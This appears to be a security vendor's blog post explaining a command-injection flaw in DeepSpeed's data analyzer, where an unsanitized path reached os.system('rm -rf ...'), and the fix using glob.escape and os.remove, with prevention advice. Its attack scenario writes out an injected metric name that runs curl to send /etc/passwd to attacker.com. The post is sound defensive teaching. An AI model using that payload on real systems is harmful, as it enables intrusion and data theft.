What is command injection?

Command injection is a vulnerability where an attacker can execute arbitrary operating system commands on the host machine by injecting malicious input into shell command strings that are executed by the application.

How do you prevent command injection in Python?

Avoid shell-executing functions like `os.system()` entirely. Use Python-native alternatives like `shutil`, `pathlib`, or `subprocess.run()` with `shell=False` and argument lists. Always validate and sanitize any user-controlled input that interacts with the filesystem or system commands.

Is input validation enough to prevent command injection?

Input validation alone is not sufficient. While it adds a layer of defense, the safest approach is to avoid shell execution entirely by using Python-native APIs. Even well-intentioned validation can miss edge cases or be bypassed by creative attackers.

Can static analysis detect command injection?

Yes, static analysis tools like Semgrep, Bandit, and commercial SAST solutions can detect patterns like `os.system()` with string interpolation. However, they work best when combined with taint analysis that tracks data flow from untrusted sources to dangerous sinks.

Command Injection via `os.system()` in DeepSpeed's Data Analyzer: A Critical Fix

Q: What CWE is command injection?

Command injection is classified as CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection').

Introduction

Machine learning infrastructure is not immune to classic security vulnerabilities. In fact, as ML frameworks grow in complexity and adoption, they become increasingly attractive targets — and increasingly likely to carry the same security pitfalls found in any large software project. This post examines a critical command injection vulnerability discovered and patched in DeepSpeed, Microsoft's popular deep learning optimization library used by organizations training large-scale models worldwide.

The vulnerability lived in a single line of Python code. One call to os.system(). One unsanitized variable. And the potential for full arbitrary command execution on any machine running the affected data pipeline.

If you write Python code that touches the filesystem, spawns subprocesses, or processes user-supplied paths — this one is for you.

The Vulnerability Explained

What Went Wrong

Inside deepspeed/runtime/data_pipeline/data_sampling/data_analyzer.py, the init_metric_results method needed to clean up old metric files before creating new ones. The original implementation did this:

# VULNERABLE CODE — DO NOT USE
metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
os.system(f"rm -rf {metric_to_sample_fname}*")

At first glance, this looks like a harmless cleanup routine. But there are two deeply problematic choices here working together:

os.system() invokes a shell interpreter (/bin/sh on Unix). This means the entire string is passed to the shell, which will happily interpret metacharacters like ;, |, &&, `, $(), and &.
metric_to_sample_fname is derived from user-supplied input — specifically from dataset configuration values or file paths provided at runtime. There is no sanitization, escaping, or validation of this value before it is embedded in the shell command string.

How Could It Be Exploited?

The attack surface opens wherever a user or an external system can influence the metric_save_path or metric_name values passed into the data pipeline. In practice, these values often come from:

Dataset configuration files (YAML/JSON)
Command-line arguments
Programmatic API calls from orchestration systems
Shared storage paths in multi-tenant training environments

An attacker who controls either of these values can craft a payload that breaks out of the intended rm -rf command and executes arbitrary shell instructions.

Attack Scenario

Imagine a multi-tenant ML platform where users submit training jobs with their own dataset configurations. A malicious user submits the following as their metric_name:

foo; curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64); echo bar

The resulting shell command becomes:

rm -rf /data/metrics/foo; curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64); echo bar*

The shell executes all three commands in sequence:
1. ✅ Removes the metric files (the intended behavior)
2. 🚨 Exfiltrates /etc/passwd to an attacker-controlled server
3. 🚨 Executes any additional payload the attacker desires

In a cloud training environment, this could mean:
- Credential theft — reading cloud provider credentials from ~/.aws/credentials or instance metadata endpoints
- Data exfiltration — stealing training datasets, model weights, or proprietary code
- Lateral movement — using the compromised node as a pivot point into internal networks
- Denial of service — destroying training checkpoints or corrupting datasets

Even without a fully adversarial scenario, a accidentally malformed path containing spaces or special characters could cause silent failures or unintended file deletions — the rm -rf making any mistake potentially catastrophic.

Why `os.system()` Is Dangerous

The Python documentation itself warns against os.system() for exactly this reason. When you pass a string to os.system(), you are essentially doing this:

/bin/sh -c "<your string here>"

The shell is a powerful interpreter. Its job is to find and execute commands, expand variables, and evaluate expressions. That power is exactly what makes it dangerous when you feed it untrusted data.

This vulnerability class is well-documented:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection")
- OWASP A03:2021: Injection
- CVSS Base Score: Typically 9.0+ (Critical) when user input reaches os.system() without sanitization

The Fix

What Changed

The fix is elegant in its simplicity: eliminate the shell entirely. Instead of asking a shell to delete files, use Python's own filesystem APIs, which operate directly on file paths without any shell interpretation.

Before (Vulnerable):

metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
os.system(f"rm -rf {metric_to_sample_fname}*")

After (Fixed):

import glob

metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
for _f in glob.glob(f"{glob.escape(metric_to_sample_fname)}*"):
    os.remove(_f)

Why This Fix Works

Let's break down each component of the fix:

1. `glob.escape()` — Neutralizing Special Characters

glob.escape(metric_to_sample_fname)

glob.escape() escapes all special glob characters (*, ?, [, ]) in the input string. This ensures that if metric_to_sample_fname contains any characters that glob would normally treat as wildcards or special tokens, they are treated as literal characters instead.

This is the path sanitization that was entirely absent in the original code.

2. `glob.glob()` — Safe Pattern Expansion

glob.glob(f"{glob.escape(metric_to_sample_fname)}*")

The glob.glob() function expands the file pattern and returns a list of matching file paths. Critically:
- It never invokes a shell
- It operates purely in Python's filesystem layer
- It returns concrete, resolved file paths — no further interpretation occurs

The trailing * (outside the escaped portion) is intentional: it matches files like metric_to_sample_0, metric_to_sample_1, etc., which is the original intent of the cleanup.

3. `os.remove()` — Direct File Deletion

os.remove(_f)

os.remove() deletes a single file by path. It makes a direct syscall — no shell, no string interpolation, no command parsing. Each file returned by glob.glob() is deleted individually and safely.

The Security Improvement at a Glance

Property	Before (os.system)	After (glob + os.remove)
Shell invoked?	✅ Yes	❌ No
Input sanitized?	❌ No	✅ Yes (glob.escape)
Metachar risk?	🚨 Critical	✅ None
Behavior on bad input	Arbitrary execution	Safe failure / no match
Intent preserved?	✅ Yes	✅ Yes

The fix is a zero-functionality-change security improvement: the code does exactly what it always intended to do — clean up old metric files — but now does so without any possibility of shell injection.

Prevention & Best Practices

This vulnerability follows a pattern that appears regularly in Python codebases. Here's how to prevent it and detect it in your own projects.

1. Never Use `os.system()` with Variable Input

The rule is simple: if the string passed to os.system() contains any variable, it is potentially dangerous. Even variables you believe are safe can be influenced by upstream inputs you haven't considered.

# ❌ Always dangerous
os.system(f"rm -rf {some_path}*")
os.system("ls " + user_input)

# ✅ Use Python's filesystem APIs instead
import shutil, glob, os
for f in glob.glob(f"{glob.escape(some_path)}*"):
    os.remove(f)

2. Prefer `subprocess` with List Arguments When You Must Spawn Processes

If you genuinely need to run an external command, use subprocess with a list of arguments (not a shell string) and shell=False (the default):

import subprocess

# ❌ Still vulnerable — shell=True defeats the purpose
subprocess.run(f"rm -rf {path}*", shell=True)

# ✅ Safe — no shell, arguments passed directly to execve
subprocess.run(["rm", "-rf", path], shell=False)

When arguments are passed as a list, they go directly to the OS execve syscall. The shell is never involved, so metacharacters are never interpreted.

3. Use `glob.escape()` Whenever Building Glob Patterns from External Input

import glob

# ❌ User input could contain *, ?, [, ]
pattern = f"{user_supplied_path}/*.log"

# ✅ Escape the user-supplied portion
pattern = f"{glob.escape(user_supplied_path)}/*.log"

4. Prefer Python-Native APIs Over Shell Commands

For common filesystem operations, Python's standard library has you covered without ever needing a shell:

Shell Command	Python Equivalent
`rm -rf path`	`shutil.rmtree(path)`
`rm file`	`os.remove(file)`
`rm file*`	`glob.glob()` + `os.remove()`
`cp src dst`	`shutil.copy2(src, dst)`
`mv src dst`	`shutil.move(src, dst)`
`mkdir -p path`	`os.makedirs(path, exist_ok=True)`
`ls path`	`os.listdir(path)`

5. Validate and Sanitize File Paths

When file paths originate from user input, configuration files, or external systems, validate them before use:

import os

def safe_metric_path(base_dir: str, metric_name: str) -> str:
    # Allow only alphanumeric characters, hyphens, and underscores
    import re
    if not re.match(r'^[a-zA-Z0-9_\-]+$', metric_name):
        raise ValueError(f"Invalid metric name: {metric_name!r}")

    # Resolve and confirm the path stays within the expected directory
    full_path = os.path.realpath(os.path.join(base_dir, metric_name))
    if not full_path.startswith(os.path.realpath(base_dir)):
        raise ValueError("Path traversal detected")

    return full_path

6. Static Analysis Tools

Several tools can automatically detect os.system() calls and other dangerous patterns in Python code:

Bandit — Python-specific security linter. The B605 rule flags os.system() calls directly.
bash bandit -r your_project/ -t B605,B607
Semgrep — Powerful pattern-matching tool with rules for command injection.
CodeQL — GitHub's semantic code analysis engine with taint-tracking for injection vulnerabilities.
OrbisAI Security — AI-powered scanner that detected this exact vulnerability automatically.

Adding these tools to your CI/CD pipeline means vulnerabilities like this one are caught before they ever reach production.

7. Security Standards References

CWE-78: OS Command Injection
OWASP Injection (A03:2021): The third most critical web application security risk
OWASP Command Injection: Detailed attack patterns and mitigations
Python Security Best Practices: Official Python docs on subprocess security

Conclusion

A single call to os.system() with an unsanitized variable is all it takes to turn a routine file cleanup into a critical security vulnerability. The lesson here isn't that the original developer was careless — it's that certain APIs are inherently dangerous when combined with variable input, and developers need to internalize which APIs those are.

The fix demonstrates something important: the most secure code is often the simplest code. Replacing a shell command with native Python filesystem operations didn't require complex cryptography, elaborate input validation, or architectural changes. It required recognizing that the shell was never necessary in the first place, and removing it entirely.

Key takeaways:

🚫 Avoid os.system() — it invokes a shell, and shells interpret metacharacters
✅ Use Python-native filesystem APIs (os.remove(), shutil, pathlib) for file operations
🔒 Use glob.escape() when building glob patterns from external input
🔍 Run Bandit or Semgrep in your CI pipeline to catch these patterns automatically
📋 Treat all external input as untrusted — including configuration files and dataset paths

Security vulnerabilities in ML infrastructure carry the same risks as vulnerabilities anywhere else — and sometimes higher, given the sensitive datasets and credentials that training environments typically handle. Secure coding practices aren't just for web applications. They belong in every line of code you ship.

This vulnerability was automatically detected and patched by OrbisAI Security. Automated security scanning helps catch issues like this before they reach production.

cwe	CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
fix	Replace os.system() with Python-native file operations that avoid shell execution
risk	Remote code execution allowing full system compromise
language	Python
root cause	Unsanitized file path interpolated directly into os.system() shell command
vulnerability	Command Injection via os.system()

Command Injection via os.system() in DeepSpeed's Data Analyzer: A Critical Fix

Answer Summary

Vulnerability at a Glance

Command Injection via `os.system()` in DeepSpeed's Data Analyzer: A Critical Fix

Introduction

The Vulnerability Explained

What Went Wrong

How Could It Be Exploited?

Attack Scenario

Why `os.system()` Is Dangerous

The Fix

What Changed

Why This Fix Works

1. `glob.escape()` — Neutralizing Special Characters

2. `glob.glob()` — Safe Pattern Expansion

3. `os.remove()` — Direct File Deletion

The Security Improvement at a Glance

Prevention & Best Practices

1. Never Use `os.system()` with Variable Input

2. Prefer `subprocess` with List Arguments When You Must Spawn Processes

3. Use `glob.escape()` Whenever Building Glob Patterns from External Input

4. Prefer Python-Native APIs Over Shell Commands

5. Validate and Sanitize File Paths

6. Static Analysis Tools

7. Security Standards References

Conclusion

Frequently Asked Questions

What is command injection?

How do you prevent command injection in Python?

What CWE is command injection?

Is input validation enough to prevent command injection?

Can static analysis detect command injection?

View the Security Fix

Related Articles

How shell command injection happens in Python subprocess and how to fix it

How command injection happens in Python subprocess and how to fix it

How command injection happens in Go ffmpeg-go and how to fix it

How command injection happens in Python os.popen() and how to fix it

How command injection happens in Node.js subprocess and how to fix it

How command injection happens in Python os.system() and how to fix it

Command Injection via os.system() in DeepSpeed's Data Analyzer: A Critical Fix

Answer Summary

Vulnerability at a Glance

Command Injection via os.system() in DeepSpeed's Data Analyzer: A Critical Fix

Introduction

The Vulnerability Explained

What Went Wrong

How Could It Be Exploited?

Attack Scenario

Why os.system() Is Dangerous

The Fix

What Changed

Why This Fix Works

1. glob.escape() — Neutralizing Special Characters

2. glob.glob() — Safe Pattern Expansion

3. os.remove() — Direct File Deletion

The Security Improvement at a Glance

Prevention & Best Practices

1. Never Use os.system() with Variable Input

2. Prefer subprocess with List Arguments When You Must Spawn Processes

3. Use glob.escape() Whenever Building Glob Patterns from External Input

4. Prefer Python-Native APIs Over Shell Commands

5. Validate and Sanitize File Paths

6. Static Analysis Tools

7. Security Standards References

Conclusion

Frequently Asked Questions

What is command injection?

How do you prevent command injection in Python?

What CWE is command injection?

Is input validation enough to prevent command injection?

Can static analysis detect command injection?

View the Security Fix

Related Articles

How shell command injection happens in Python subprocess and how to fix it

How command injection happens in Python subprocess and how to fix it

How command injection happens in Go ffmpeg-go and how to fix it

How command injection happens in Python os.popen() and how to fix it

How command injection happens in Node.js subprocess and how to fix it

How command injection happens in Python os.system() and how to fix it

Command Injection via `os.system()` in DeepSpeed's Data Analyzer: A Critical Fix

Why `os.system()` Is Dangerous

1. `glob.escape()` — Neutralizing Special Characters

2. `glob.glob()` — Safe Pattern Expansion

3. `os.remove()` — Direct File Deletion

1. Never Use `os.system()` with Variable Input

2. Prefer `subprocess` with List Arguments When You Must Spawn Processes

3. Use `glob.escape()` Whenever Building Glob Patterns from External Input